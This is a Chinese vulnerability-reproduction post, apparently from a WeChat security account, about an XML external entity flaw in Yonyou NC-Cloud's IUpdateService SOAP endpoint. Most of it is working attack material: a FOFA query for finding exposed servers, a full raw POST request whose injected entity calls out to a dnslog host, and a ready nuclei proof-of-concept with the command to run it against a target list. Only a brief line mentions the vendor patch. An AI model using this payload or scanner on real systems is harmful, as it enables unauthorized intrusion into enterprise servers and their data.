01
—
漏洞名称
02
—
漏洞影响
用友NC-Cloud
03
—
漏洞描述
用友NC-Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现人、财、物、客的 全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。该系统/uapws/service/nc.uap.oba.update.IUpdateService接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器被远控。
04
—
body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
05
—
漏洞复现
注册一个dnslog平台,如http://dnslog.pw/dns/?&monitor=true,向靶场发送如下数据包,访问dns
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1Host: 192.168.40.130:8989User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Content-Length: 421Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: text/xml;charset=UTF-8SOAPAction: urn:getResultUpgrade-Insecure-Requests: 1<soapenv:Envelopexmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"xmlns:iup="http://update.oba.uap.nc/IUpdateService"><soapenv:Header/><soapenv:Body><iup:getResult><!--type: string--><iup:string><![CDATA[<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]><xxx/>]]></iup:string></iup:getResult></soapenv:Body></soapenv:Envelope>
在DNSlog平台能看到访问记录
漏洞复现成功
06
—
nuclei poc
poc文件内容如下
id: yonyou-nc-cloud-IUpdateService-xxeinfo:name: 用友NC-Cloud soapFormat XXE漏洞author: fgzseverity: criticaldescription: 用友NC-Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现人、财、物、客的 全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。该系统/uapws/service/nc.uap.oba.update.IUpdateService接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器被远控。metadata:max-request: 1fofa-query: body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"verified: truerequests:- raw:- |-POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: {{Hostname}}Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeSOAPAction: urn:getResultContent-Type: text/xml;charset=UTF-8Content-Length: 397<soapenv:Envelopexmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"xmlns:iup="http://update.oba.uap.nc/IUpdateService"><soapenv:Header/><soapenv:Body><iup:getResult><!--type: string--><iup:string><![CDATA[<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://{{interactsh-url}}">%aaa;%ccc;%ddd;]><xxx/>]]></iup:string></iup:getResult></soapenv:Body></soapenv:Envelope>matchers:- type: dsldsl:- contains(interactsh_protocol, "dns")condition: and
运行POC
.nuclei.exe -t mypoc/用友/nc-cloud/yonyou-nc-cloud-IUpdateService-xxe.yaml -l data/用友-NC-Cloud2.txt
07
—
修复建议
用友安全中心已经发布补丁,请及时修复。
https://security.yonyou.com/#/home原文始发于微信公众号(AI与网安):【漏洞复现】用友NC-Cloud IUpdateService xml外部实体注入漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论